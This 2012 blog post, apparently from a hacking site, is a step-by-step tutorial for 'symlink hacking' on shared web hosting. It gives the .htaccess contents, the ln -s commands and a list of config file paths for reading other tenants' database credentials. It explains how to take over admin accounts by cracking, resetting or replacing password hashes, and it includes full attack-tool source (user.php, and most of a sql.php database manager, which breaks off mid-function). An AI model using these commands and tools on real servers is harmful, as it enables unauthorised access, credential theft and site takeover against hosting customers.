Friday 27 July 2012

Symlink Hacking TuT



Hello guy This Is Maher Bro, today I will explain how symlinking process goes step by step, in two different methods 

#First Method:-
After uploading the shell make a new directory by an option or execute this command:
Quote:mkdir sym
that will make a directory with the name "sym"
then enter the directory you made, then make a file and call it ".htaccess" by running this command:
Quote:touch .htaccess
then put the code inside
or make it on your PC and upload it.
and this is the code you should put in that file:
Code:
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
  AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any
as you can see in the following picture the file name is sym, and I'm showing the content of ".htaccess" file
[Image: kaoknd.png]
Then, execute this command:
Quote:ln -s / root
so now in our directory "sym" we have the ".htaccess" and something like this [root] (which is a symlink to /root directory)
and it will look like this:
[Image: 15g9qx4.png]
cool guyz? lets carry on..
now go to the website's link and enter your directory from there, for example it might be like this:
http://www.victim.com/sym
hit enter, now you should see something like this:
[Image: 4l6fv.png]
if it was like the picture above, then you're good to go!
now download "user.php" from the attachments and upload it to your victim's website.
that will show you all the websites on the server along side with their users.
ok, now pick up any site's user and lets hack it!
after you know the user go to your URL and type this:
http://www.victim.com/sym/root/home/(user)/public_html

#Ofcourse replace =>(user) with the target website user. 
you will see something like this:
[Image: mr8mrb.png]
the user in that picture is "hillock"
now you will be able to browse that site's files.
but, we are looking for a specific file called "config.php" OR "configration.php" or some websites have different name but those are the most commen ones.
here is some famous WebApps with their configeration file location:

Quote:vBulletin -- /includes/config.php
IPB -- /conf_global.php
MyBB -- /inc/config.php
Phpbb -- /config.php
Php Nuke -- /config.php
Php-Fusion -- config.php
SMF -- /Settings.php
Joomla -- configuration.php , configuration.php-dist
WordPress -- /wp-config.php
Drupal -- /sites/default/settings.php
Oscommerce -- /includes/configure.php
e107 -- /e107_config.php
Seditio -- /datas/config.php

so after you find the configeration file, you will look for DB user and password, for example the picture below shows a joomla! configration file and I've selected the info we look for:
[Image: 14abedw.png]
after that, download sql.php from the attachments and upload it through your shell
then copy those login info from the configration file and sign in in sql.php
when you sign in, it will look something like this:
[Image: 14jnjfl.png]
I'll tell you what to do after that in the end!
=======================================
#second method:-
this method is almost the same, but we don't read the configeration file from the same site, but we symlink it to our victim's site as a .txt file, lets see how to do it!
now for this method you don't need to symlink /root directory, but you will symlink the target website's public_html
now lets see the steps,
#First make a directory (just like /sym/ directory in the first method)
#Second make ".htaccess" file but with this code:
Code:
Options Indexes FollowSymlinks
DirectoryIndex maher.htm
AddType txt .php
AddHandler txt .php
#Finally symlink the target website with this command:
Quote:ln -s /home/(user)/public_html (user)
then enter your directory put the URL like this:
http://www.victim.com/sym/
and you should see something like this:
[Image: 14v192q.png]
in this picture the user is "csseipsn"
now click on the user and again you will be able to browse the website's files and look for the configeration file! and then do the same as the first method!
============================
Now what to do in sql.php?
its simple, sql.php give you access to MySQL database and make you able to edit the data.
now just find the admin's table, crack the hash and you will have the password and sign in!
Hmm... the hash didn't crack? no problem, change the admin's email and choose forget password option and they will send you a new password!
and the third way is to change the admin's hash to your hash and sign in 
well thats it! 
hope you liked it! 
User.php
PHP Code:
<?echo "<title>Priv8 # Domains & Users</title>
<style>
body,table{background: black; font-family:Verdana,tahoma; color: white; font-size:10px; }
A:link {text-decoration: none;color: red;}
A:active {text-decoration: none;color: red;}
A:visited {text-decoration: none;color: red;}
A:hover {text-decoration: underline; color: red;}
#new,input,table,td,tr,#gg{text-align:center;border-style:solid;text-decoration:bold;}
tr:hover,td:hover{text-align:center;background-color: #FFFFCC; color:green;}
</style>
<p align=center># Domains & Users</p>
<p align=center>by Priv8 </p>
<center>";
$d0mains = @file("/etc/named.conf");

if(!$d0mains){ die("<b># can't ReaD -> [ /etc/named.conf ]"); }

echo "<table align=center border=1>
<tr bgcolor=green><td>Domains</td><td>Users</td></tr>";

foreach($d0mains as $d0main){

if(eregi("zone",$d0main)){
preg_match_all('#zone "(.*)"#'$d0main$domains);flush();

if(strlen(trim($domains[1][0])) > 2){
$user posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));

echo "<tr><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td>".$user['name']."</td></tr>"flush();

}}}

echo "</table>
<p align='center'> Priv8
</p>
";
?>
Sql.php
PHP Code:
<?/*
 * MySQL Web Interface By JIKo
 * -------------------------------
 * Developed By sNiper_hEx
*/
if ( function_exists('ini_get') ) {
    $onoff ini_get('register_globals');
} else {
    $onoff get_cfg_var('register_globals');
}
if ($onoff != 1) {
    @extract($HTTP_SERVER_VARSEXTR_SKIP);
    @extract($HTTP_COOKIE_VARSEXTR_SKIP);
    @extract($HTTP_POST_FILESEXTR_SKIP);
    @extract($HTTP_POST_VARSEXTR_SKIP);
    @extract($HTTP_GET_VARSEXTR_SKIP);
    @extract($HTTP_ENV_VARSEXTR_SKIP);
}

function logon() {
    global $PHP_SELF;

    setcookie"mysql_web_admin_username" );
    setcookie"mysql_web_admin_password" );
    setcookie"mysql_web_admin_hostname" );
    echo "<html>\n";
    echo "<head>\n";
    echo "<title>MySQL New by jiko</title>\n";
    echo "</head>\n";
    echo "<body>\n";
    echo "<table width=100% height=100%><tr><td><center>\n";
    echo "<table cellpadding=2><tr><td bgcolor=#a4a260><center>\n";
    echo "<table cellpadding=20><tr><td bgcolor=#ffffff><center>\n";
    echo "<h1>MySQL Web by jiko</h1>\n";
    echo "<form action='$PHP_SELF'>\n";
    echo "<input type=hidden name=action value=logon_submit>\n";
    echo "<table cellpadding=5 cellspacing=1>\n";
    echo "<tr><td>Hostname </td><td> <input type=text name=hostname value='localhost'></td></tr>\n";
    echo "<tr><td>Username </td><td> <input type=text name=username></td></tr>\n";
    echo "<tr><td>Password </td><td> <input type=password name=password></td></tr>\n";
    echo "</table><p>\n";
    echo "<input type=submit value='Enter'>\n";
    echo "<input type=reset value='Clear'><br>\n";
    echo "</form>\n";
    echo "</center></td></tr></table>\n";
    echo "</center></td></tr></table>\n";
    echo "<p><hr width=300>\n";
    echo "</center></td></tr></table>\n";
    echo "</body>\n";
    echo "</html>\n";
}

function logon_submit() {
    global $username$password$hostname ,$PHP_SELF;
    if($hostname =='')
        $hostname 'localhost';
    setcookie"mysql_web_admin_username"$username );
    setcookie"mysql_web_admin_password"$password );
    setcookie"mysql_web_admin_hostname"$hostname );
    echo "<html>";
    echo "<head>";
    echo "<META HTTP-EQUIV=Refresh CONTENT='0; URL=$PHP_SELF?action=listDBs'>";
    echo "</head>";
    echo "</html>";
}

function echoQueryResult() {
    global $queryStr$errMsg;

    if( $errMsg == "" $errMsg "Success";
    if( $queryStr != "" ) {
        echo "<table cellpadding=5>\n";
        echo "<tr><td>Query</td><td>$queryStr</td></tr>\n";
        echo "<tr><td>Result</td><td>$errMsg</td></tr>\n";
        echo "</table><p>\n";
    }
}

function listDatabases() {
    global $mysqlHandle$PHP_SELF;

    echo "<h1>Databases List</h1>\n";

    echo "<form action='$PHP_SELF'>\n";
    echo "<input type=hidden name=action value=createDB>\n";
    echo "<input type=text name=dbname>\n";
    echo "<input type=submit value='Create Database'>\n";
    echo "</form>\n";
    echo "<hr>\n";

    echo "<table cellspacing=1 cellpadding=5>\n";

    $pDB mysql_list_dbs$mysqlHandle );
    $num mysql_num_rows$pDB );
    for( $i 0$i $num$i++ ) {
        $dbname mysql_dbname$pDB$i );
        echo "<tr>\n";
        echo "<td>$dbname</td>\n";
        echo "<td><a href='$PHP_SELF?action=listTables&dbname=$dbname'>Tables</a></td>\n";
        echo "<td><a href='$PHP_SELF?action=dropDB&dbname=$dbname' onClick=\"return confirm('Drop Database \'$dbname\'?')\">Drop</a></td>\n";
        echo "<td><a href='$PHP_SELF?action=dumpDB&dbname=$dbname' onClick=\"return confirm('Dump Database \'$dbname\'?')\">Dump</a></td>\n";
        echo "</tr>\n";
    }
    echo "</table>\n";
}

function createDatabase() {
    global $mysqlHandle$dbname$PHP_SELF;

    mysql_create_db$dbname$mysqlHandle );
    listDatabases();
}

function dropDatabase() {
    global $mysqlHandle$dbname$PHP_SELF;

    mysql_drop_db$dbname$mysqlHandle );
    listDatabases();
}

function listTables() {
    global $mysqlHandle$dbname$PHP_SELF;


    echo "<h1>Tables List</h1>\n";
    echo "<p class=location>$dbname</p>\n";
    echoQueryResult();
    echo "<form action='$PHP_SELF'>\n";
    echo "<input type=hidden name=action value=createTable>\n";
    echo "<input type=hidden name=dbname value=$dbname>\n";
    echo "<input type=text name=tablename>\n";
    echo "<input type=submit value='Create Table'>\n";
    echo "</form>\n";
    echo "<form action='$PHP_SELF'>\n";
    echo "<input type=hidden name=action value=query>\n";
    echo "<input type=hidden name=dbname value=$dbname>\n";
    echo "<input type=text size=120 name=queryStr>\n";
    echo "<input type=submit value='Query'>\n";
    echo "</form>\n";
    echo "<hr>\n";

    $pTable mysql_list_tables$dbname );

    if( $pTable == ) {
        $msg  mysql_error();
        echo "<h3>Error : $msg</h3><p>\n";
        return;
    }
    $num mysql_num_rows$pTable );

    echo "<table cellspacing=1 cellpadding=5>\n";

    for( $i 0$i $num$i++ ) {
        $tablename mysql_tablename$pTable$i );

        echo "<tr>\n";
        echo "<td>\n";
        echo "$tablename\n";
        echo "</td>\n";
        echo "<td>\n";
        echo "<a href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
        echo "</td>\n";
        echo "<td>\n";
        echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename'>Data</a>\n";
        echo "</td>\n";
        echo "<td>\n";
        echo "<a href='$PHP_SELF?action=dropTable&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Drop Table \'$tablename\'?')\">Drop</a>\n";
        echo "</td>\n";
        echo "<td>\n";
        echo "<a href='$PHP_SELF?action=dumpTable&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Dump Table \'$tablename\'?')\">Dump</a>\n";
        echo "</td>\n";
        echo "</tr>\n";
    }

    echo "</table>";
}

function createTable() {
    global $mysqlHandle$dbname$tablename$PHP_SELF$queryStr$errMsg;

    $queryStr "CREATE TABLE $tablename ( no INT )";
    mysql_select_db$dbname$mysqlHandle );
    mysql_query$queryStr$mysqlHandle );
    $errMsg mysql_error();

    listTables();
}

function dropTable() {
    global $mysqlHandle$dbname$tablename$PHP_SELF$queryStr$errMsg;

    $queryStr "DROP TABLE $tablename";
    mysql_select_db$dbname$mysqlHandle );
    mysql_query$queryStr$mysqlHandle );
    $errMsg mysql_error();

    listTables();
}

function viewSchema() {
    global $mysqlHandle$dbname$tablename$PHP_SELF$queryStr$errMsg;

    echo "<h1>Table Schema</h1>\n";
    echo "<p class=location>$dbname > $tablename</p>\n";

    echoQueryResult();

    echo "<a href='$PHP_SELF?action=addField&dbname=$dbname&tablename=$tablename'>Add Field</a> | \n";
    echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename'>View Data</a>\n";
    echo "<hr>\n";

    $pResult mysql_db_query$dbname"SHOW fields FROM $tablename);
    $num mysql_num_rows$pResult );

    echo "<table cellspacing=1 cellpadding=5>\n";
    echo "<tr>\n";
    echo "<th>Field</th>\n";
    echo "<th>Type</th>\n";
    echo "<th>Null</th>\n";
    echo "<th>Key</th>\n";
    echo "<th>Default</th>\n";
    echo "<th>Extra</th>\n";
    echo "<th colspan=2>Action</th>\n";
    echo "</tr>\n";


    for( $i 0$i $num$i++ ) {
        $field mysql_fetch_array$pResult );
        echo "<tr>\n";
        echo "<td>".$field["Field"]."</td>\n";
        echo "<td>".$field["Type"]."</td>\n";
        echo "<td>".$field["Null"]."</td>\n";
        echo "<td>".$field["Key"]."</td>\n";
        echo "<td>".$field["Default"]."</td>\n";
        echo "<td>".$field["Extra"]."</td>\n";
        $fieldname $field["Field"];
        echo "<td><a href='$PHP_SELF?action=editField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname'>Edit</a></td>\n";
        echo "<td><a href='$PHP_SELF?action=dropField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname' onClick=\"return confirm('Drop Field \'$fieldname\'?')\">Drop</a></td>\n";
        echo "</tr>\n";
    }
    echo "</table>\n";

}

function manageField$cmd ) {
    global $mysqlHandle$dbname$tablename$fieldname$PHP_SELF;

    if( $cmd == "add" )
        echo "<h1>Add Field</h1>\n";
    else if( $cmd == "edit" ) {
        echo "<h1>Edit Field</h1>\n";
        $pResult mysql_db_query$dbname"SHOW fields FROM $tablename);
        $num mysql_num_rows$pResult );
        for( $i 0$i $num$i++ ) {
            $field mysql_fetch_array$pResult );
            if( $field["Field"] == $fieldname ) {
                $fieldtype $field["Type"];
                $fieldkey $field["Key"];
                $fieldextra $field["Extra"];
                $fieldnull $field["Null"];
                $fielddefault $field["Default"];
                break;
            }
        }
        $type strtok$fieldtype" (,)\n" );
        if( strpos$fieldtype"(" ) ) {
            if( $type == "enum" $type == "set" ) {
                $valuelist strtok" ()\n" );
            } else {
                $M strtok" (,)\n" );
                if( strpos$fieldtype"," ) )
                    $D strtok" (,)\n" );
            }
        }
    }

    echo "<p class=location>$dbname > $tablename</p>\n";
    echo "<form action=$PHP_SELF>\n";

    if( $cmd == "add" )
        echo "<input type=hidden name=action value=addField_submit>\n";
    else if( $cmd == "edit" ) {
        echo "<input type=hidden name=action value=editField_submit>\n";
        echo "<input type=hidden name=old_name value=$fieldname>\n";
    }
    echo "<input type=hidden name=dbname value=$dbname>\n";
    echo "<input type=hidden name=tablename value=$tablename>\n";

    echo "<h3>Name</h3>\n";
    echo "<input type=text name=name value=$fieldname><p>\n";
    echo '

<h3>Type</h3>

<font size=2>
* `M\' indicates the maximum display size.<br>
* `D\' applies to floating-point types and indicates the number of digits following the decimal point.<br>
</font>

<table>
<tr>
<th>Type</th><th>&nbspM&nbsp</th><th>&nbspD&nbsp</th><th>unsigned</th><th>zerofill</th><th>binary</th>
</tr>
<tr>
<td><input type=radio name=type value="TINYINT" '; if( $type == "tinyint" ) echo "checked";echo '>TINYINT (-128 ~ 127)</td>
<td align=center>O</td>
<td>&nbsp</td>
<td align=center>O</td>
<td align=center>O</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="SMALLINT" '; if( $type == "smallint" ) echo "checked";echo '>SMALLINT (-32768 ~ 32767)</td>
<td align=center>O</td>
<td>&nbsp</td>
<td align=center>O</td>
<td align=center>O</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="MEDIUMINT" '; if( $type == "mediumint" ) echo "checked";echo '>MEDIUMINT (-8388608 ~ 8388607)</td>

<td align=center>O</td>
<td>&nbsp</td>
<td align=center>O</td>
<td align=center>O</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="INT" '; if( $type == "int" ) echo "checked";echo '>INT (-2147483648 ~ 2147483647)</td>
<td align=center>O</td>
<td>&nbsp</td>
<td align=center>O</td>
<td align=center>O</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="BIGINT" '; if( $type == "bigint" ) echo "checked";echo '>BIGINT (-9223372036854775808 ~ 9223372036854775807)</td>
<td align=center>O</td>
<td>&nbsp</td>
<td align=center>O</td>
<td align=center>O</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="FLOAT" '; if( $type == "float" ) echo "checked";echo '>FLOAT</td>
<td align=center>O</td>
<td align=center>O</td>
<td>&nbsp</td>
<td align=center>O</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="DOUBLE" '; if( $type == "double" ) echo "checked";echo '>DOUBLE</td>
<td align=center>O</td>
<td align=center>O</td>
<td>&nbsp</td>
<td align=center>O</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="DECIMAL" '; if( $type == "decimal" ) echo "checked";echo '>DECIMAL(NUMERIC)</td>
<td align=center>O</td>
<td align=center>O</td>
<td>&nbsp</td>
<td align=center>O</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="DATE" '; if( $type == "date" ) echo "checked";echo '>DATE (1000-01-01 ~ 9999-12-31, YYYY-MM-DD)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="DATETIME" '; if( $type == "datetime" ) echo "checked";echo '>DATETIME (1000-01-01 00:00:00 ~ 9999-12-31 23:59:59, YYYY-MM-DD HH:MM:SS)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="TIMESTAMP" '; if( $type == "timestamp" ) echo "checked";echo '>TIMESTAMP (1970-01-01 00:00:00 ~ 2106..., YYYYMMDD[HH[MM[SS]]])</td>
<td align=center>O</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="TIME" '; if( $type == "time" ) echo "checked";echo '>TIME (-838:59:59 ~ 838:59:59, HH:MM:SS)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="YEAR" '; if( $type == "year" ) echo "checked";echo '>YEAR (1901 ~ 2155, 0000, YYYY)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="CHAR" '; if( $type == "char" ) echo "checked";echo '>CHAR</td>
<td align=center>O</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td align=center>O</td>
</tr>
<tr>
<td><input type=radio name=type value="VARCHAR" '; if( $type == "varchar" ) echo "checked";echo '>VARCHAR</td>
<td align=center>O</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td align=center>O</td>
</tr>
<tr>
<td><input type=radio name=type value="TINYTEXT" '; if( $type == "tinytext" ) echo "checked";echo '>TINYTEXT (0 ~ 255)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="TEXT" '; if( $type == "text" ) echo "checked";echo '>TEXT (0 ~ 65535)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="MEDIUMTEXT" '; if( $type == "mediumtext" ) echo "checked";echo '>MEDIUMTEXT (0 ~ 16777215)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="LONGTEXT" '; if( $type == "longtext" ) echo "checked";echo '>LONGTEXT (0 ~ 4294967295)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="TINYBLOB" '; if( $type == "tinyblob" ) echo "checked";echo '>TINYBLOB (0 ~ 255)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="BLOB" '; if( $type == "blob" ) echo "checked";echo '>BLOB (0 ~ 65535)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="MEDIUMBLOB" '; if( $type == "mediumblob" ) echo "checked";echo '>MEDIUMBLOB (0 ~ 16777215)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="LONGBLOB" '; if( $type == "longblob" ) echo "checked";echo '>LONGBLOB (0 ~ 4294967295)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="ENUM" '; if( $type == "enum" ) echo "checked";echo '>ENUM</td>
<td colspan=5><center>value list</center></td>
</tr>
<tr>
<td><input type=radio name=type value="SET" '; if( $type == "set" ) echo "checked";echo '>SET</td>
<td colspan=5><center>value list</center></td>
</tr>

</table>
<table>
<tr><th>M</th><th>D</th><th>unsigned</th><th>zerofill</th><th>binary</th><th>value list (ex: \'apple\', \'orange\', \'banana\') </th></tr>
<tr>
<td align=center><input type=text size=4 name=M '; if( $M != "" ) echo "value=$M";echo '></td>
<td align=center><input type=text size=4 name=D '; if( $D != "" ) echo "value=$D";echo '></td>
<td align=center><input type=checkbox name=unsigned value="UNSIGNED" '; if( strpos$fieldtype"unsigned" ) ) echo "checked";echo '></td>
<td align=center><input type=checkbox name=zerofill value="ZEROFILL" '; if( strpos$fieldtype"zerofill" ) ) echo "checked";echo '></td>
<td align=center><input type=checkbox name=binary value="BINARY" '; if( strpos$fieldtype"binary" )  ) echo "checked";echo '></td>
<td align=center><input type=text size=60 name=valuelist '; if( $valuelist != "" ) echo "value=\"$valuelist\"";echo '></td>
</tr>
</table>


<h3>Flags</h3>
<table>
<tr><th>not null</th><th>default value</th><th>auto increment</th><th>primary key</th></tr>
<tr>
<td align=center><input type=checkbox name=not_null value="NOT NULL" '; if( $fieldnull != "YES" ) echo "checked";echo '></td>
<td align=center><input type=text name=default_value '; if( $fielddefault != "" ) echo "value=$fielddefault";echo '></td>
<td align=center><input type=checkbox name=auto_increment value="AUTO_INCREMENT" '; if( $fieldextra == "auto_increment" ) echo "checked";echo '></td>
<td align=center><input type=checkbox name=primary_key value="PRIMARY KEY" '; if( $fieldkey == "PRI" ) echo "checked";echo '></td>
</tr>
</table>

<p>';

    if( $cmd == "add" )
        echo "<input type=submit value='Add Field'>\n";
    else if( $cmd == "edit" )
        echo "<input type=submit value='Edit Field'>\n";
    echo "<input type=button value=Cancel onClick='history.back()'>\n";
    echo "</form>\n";
}

function manageField_submit$cmd ) {
    global $mysqlHandle$dbname$tablename$old_name$name$type$PHP_SELF$queryStr$errMsg,
        $M$D$unsigned$zerofill$binary$not_null$default_value$auto_increment$primary_key$valuelist;

    if( $cmd == "add" )
        $queryStr "ALTER TABLE $tablename ADD $name ";
    else if( $cmd == "edit" )
        $queryStr "ALTER TABLE $tablename CHANGE $old_name $name ";
   
    if( $M != "" )
        if( $D != "" )
            $queryStr .= "$type($M,$D) ";
        else
            $queryStr .= "$type($M) ";
    else if( $valuelist != "" ) {
        $valuelist stripslashes$valuelist );
        $queryStr .= "$type($valuelist) ";
    } else
        $queryStr .= "$type ";

    $queryStr .= "$unsigned $zerofill $binary ";

    if( $default_value != "" )
        $queryStr .= "DEFAULT '$default_value' ";
   
    $queryStr .= "$not_null $auto_increment";

    mysql_select_db$dbname$mysqlHandle );
    mysql_query$queryStr$mysqlHandle );
    $errMsg mysql_error();

    // key change
    $keyChange false;
    $result mysql_query"SHOW KEYS FROM $tablename);
    $primary "";
    while( $row mysql_fetch_array($result) )
        if( $row["Key_name"] == "PRIMARY" ) {
            if( $row[Column_name] == $name )
                $keyChange true;
            else
                $primary .= ", $row[Column_name]";
        }
    if( $primary_key == "PRIMARY KEY" ) {
        $primary .= ", $name";
        $keyChange = !$keyChange;
    }
    $primary substr$primary);
    if( $keyChange == true ) {
        $q "ALTER TABLE $tablename DROP PRIMARY KEY";
        mysql_query$q );
        $queryStr .= "<br>\n" $q;
        $errMsg .= "<br>\n" mysql_error();
        $q "ALTER TABLE $tablename ADD PRIMARY KEY( $primary )";
        mysql_query$q );
        $queryStr .= "<br>\n" $q;
        $errMsg .= "<br>\n" mysql_error();
    }

    viewSchema();
}

function dropField() {
    global $mysqlHandle$dbname$tablename$fieldname$PHP_SELF$queryStr$errMsg;

    $queryStr "ALTER TABLE $tablename DROP COLUMN $fieldname";
    mysql_select_db$dbname$mysqlHandle );
    mysql_query$queryStr $mysqlHandle );
    $errMsg mysql_error();

    viewSchema();
}

function viewData$queryStr ) {
    global $action$mysqlHandle$dbname$tablename$PHP_SELF$errMsg$page$rowperpage$orderby;

    echo "<h1>Data in Table</h1>\n";
    if( $tablename != "" )
        echo "<p class=location>$dbname > $tablename</p>\n";
    else
        echo "<p class=location>$dbname</p>\n";

    $queryStr stripslashes$queryStr );
    if( $queryStr == "" ) {
        $queryStr "SELECT * FROM $tablename";
        if( $orderby != "" )
            $queryStr .= " ORDER BY $orderby";
        echo "<a href='$PHP_SELF?action=addData&dbname=$dbname&tablename=$tablename'>Add Data</a> | \n";
        echo "<a href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
    }

    $pResult mysql_db_query$dbname$queryStr );
    $fieldt mysql_fetch_field($pResult);
    $tablename $fieldt->table;
    $errMsg mysql_error();

    $GLOBALS[queryStr] = $queryStr;

    if( $pResult == false ) {
        echoQueryResult();
        return;
    }
    if( $pResult == ) {
        $errMsg "Success";
        echoQueryResult();
        return;
    }

    echo "<hr>\n";

    $row mysql_num_rows$pResult );
    $col mysql_num_fields$pResult );

    if( $row == ) {
        echo "No Data Exist!";
        return;
    }
   
    if( $rowperpage == "" $rowperpage 30;
    if( $page == "" $page 0;
    else $page--;
    mysql_data_seek$pResult$page $rowperpage );

    echo "<table cellspacing=1 cellpadding=2>\n";
    echo "<tr>\n";
    for( $i 0$i $col$i++ ) {
        $field mysql_fetch_field$pResult$i );
        echo "<th>";
        if($action == "viewData")
            echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&orderby=".$field->name."'>".$field->name."</a>\n";
        else
            echo "<font    style='text-decoration:none;color:#000000;font-size:x-small;'>".$field->name."</font>\n";
        echo "</th>\n";
    }
    echo "<th colspan=2>Action</th>\n";
    echo "</tr>\n";

    for( $i 0$i $rowperpage$i++ ) {
        $rowArray mysql_fetch_row$pResult );
        if( $rowArray == false ) break;
        echo "<tr>\n";
        $key "";
        for( $j 0$j $col$j++ ) {
            $data $rowArray[$j];

            $field mysql_fetch_field$pResult$j );
            if( $field->primary_key == )
                $key .= "&" $field->name "=" $data;

            if( strlen$data ) > 30 )
                $data substr$data030 ) . "...";
            $data htmlspecialchars$data );
            echo "<td>\n";
            echo "$data\n";
            echo "</td>\n";
        }
        
        if( $key == "" )
            echo "<td colspan=2>no Key</td>\n";
        else {
            echo "<td><a href='$PHP_SELF?action=editData$key&dbname=$dbname&tablename=$tablename'>Edit</a></td>\n";
            echo "<td><a href='$PHP_SELF?action=deleteData$key&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Delete Row?')\">Delete</a></td>\n";
        }
        echo "</tr>\n";
    }
    echo "</table>\n";

    echo "<font size=2>\n";
    if($action == "viewData")
        echo "<form action='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename' method=post>\n";
    else
        echo "<form action='$PHP_SELF?action=query&dbname=$dbname&tablename=$tablename&queryStr=$queryStr' method=post>\n";
    echo "<font color=green>\n";
    echo ($page+1)."/".(int)($row/$rowperpage+1)." page";
    echo "</font>\n";
    echo " | ";
    if( $page ) {
        if($action == "viewData")
            echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&page=".($page);
        else
            echo "<a href='$PHP_SELF?action=query&dbname=$dbname&tablename=$tablename&queryStr=$queryStr&page=".($page);
        if( $orderby != "" && $action == "viewData")
            echo "&orderby=$orderby";
        echo "'>Prev</a>\n";
    } else
        echo "Prev";
    echo " | ";
    if( $page < ($row/$rowperpage)-) {
        if($action == "viewData")
            echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&page=".($page+2);
        else
            echo "<a href='$PHP_SELF?action=query&dbname=$dbname&tablename=$tablename&queryStr=$queryStr&page=".($page+2);
        if( $orderby != "" && $action == "viewData")
            echo "&orderby=$orderby";
        echo "'>Next</a>\n";
    } else
        echo "Next";
    echo " | ";
    if( $row $rowperpage ) {
        echo "<input type=text size=4 name=page>\n";
        echo "<input type=submit value='Go'>\n";
    }
    echo "</form>\n";
    echo "</font>\n";
}

function manageData$cmd ) {
    global $mysqlHandle$dbname$tablename$PHP_SELF;

    if( $cmd == "add" )
        echo "<h1>Add Data</h1>\n";
    else if( $cmd == "edit" ) {
        echo "<h1>Edit Data</h1>\n";
        $pResult mysql_list_fields$dbname$tablename );
        $num mysql_num_fields$pResult );
   
        $key "";
        for( $i 0$i $num$i++ ) {
            $field mysql_fetch_field$pResult$i );
            if( $field->primary_key == )
                if( $field->numeric == )
                    $key .= $field->name "=" $GLOBALS[$field->name] . " AND ";
                else
                    $key .= $field->name "='" $GLOBALS[$field->name] . "' AND ";
        }
        $key substr$key0strlen($key)-);

        mysql_select_db$dbname$mysqlHandle );
        $pResult mysql_query$queryStr =  "SELECT * FROM $tablename WHERE $key"$mysqlHandle );
        $data mysql_fetch_array$pResult );
    }

    echo "<p class=location>$dbname > $tablename</p>\n";

    echo "<form action='$PHP_SELF' method=post>\n";
    if( $cmd == "add" )
        echo "<input type=hidden name=action value=addData_submit>\n";
    else if( $cmd == "edit" )
        echo "<input type=hidden name=action value=editData_submit>\n";
    echo "<input type=hidden name=dbname value=$dbname>\n";
    echo "<input type=hidden name=tablename value=$tablename>\n";
    echo "<table cellspacing=1 cellpadding=2>\n";
    echo "<tr>\n";
    echo "<th>Name</th>\n";
    echo "<th>Type</th>\n";
    echo "<th>Function</th>\n";
    echo "<th>Data</th>\n";
    echo "</tr>\n";

    $pResult mysql_db_query$dbname"SHOW fields FROM $tablename);
    $num mysql_num_rows$pResult );

    $pResultLen mysql_list_fields$dbname$tablename );

    for( $i 0$i $num$i++ ) {
        $field mysql_fetch_array$pResult );
        $fieldname $field["Field"];
